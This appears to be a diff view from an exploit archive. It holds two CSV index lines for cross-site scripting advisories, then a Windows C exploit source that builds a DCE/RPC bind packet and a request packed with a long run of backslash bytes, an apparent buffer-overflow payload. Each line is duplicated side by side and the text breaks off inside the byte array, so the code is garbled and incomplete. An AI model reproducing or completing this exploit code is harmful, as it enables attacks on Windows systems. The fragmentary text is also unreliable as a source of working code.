28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0 28565,platforms/php/webapps/28565.txt,"PHP Event Calendar 1.4/1.5 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,"NR Nandini",php,webapps,0
28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0 28566,platforms/asp/webapps/28566.txt,"Snitz Forums 2000 Forum.ASP Cross-Site Scripting Vulnerability",2006-09-13,ajann,asp,webapps,0


@ -1,216 +1,216 @@
#include <stdio.h> #include <stdio.h>
#include <windows.h> #include <windows.h>
#pragma comment(lib, "mpr") #pragma comment(lib, "mpr")
#pragma comment(lib, "Rpcrt4") #pragma comment(lib, "Rpcrt4")
unsigned char szBindString[] = unsigned char szBindString[] =
{ {
0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0x05,0x00,0x0b,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0xb8,0x10,0xb8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b, 0x40,0x4e,0x9f,0x8d,0x3d,0xa0,0xce,0x11,0x8f,0x69,0x08,0x00,0x3e,0x30,0x05,0x1b,
0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00, 0x01,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,
0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00 0x2b,0x10,0x48,0x60,0x02,0x00,0x00,0x00
}; };
unsigned char szRequestString[] = unsigned char szRequestString[] =
{ {
0x05,0x00, 0x05,0x00,
0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08, 0x00,0x03,0x10,0x00,0x00,0x00,0x30,0x08,0x00,0x00,0x01,0x00,0x00,0x00,0x18,0x08,
0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x0a,0x00,0x44,0xf7,0x12,0x00,0x00,0x04,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00, 0x00,0x00,0x00,0x04,0x00,0x00,0x48,0x00,0x54,0x00,0x52,0x00,0x45,0x00,0x45,0x00,
0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x52,0x00,0x4f,0x00,0x4f,0x00,0x54,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00, 0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,0x5c,0x00,
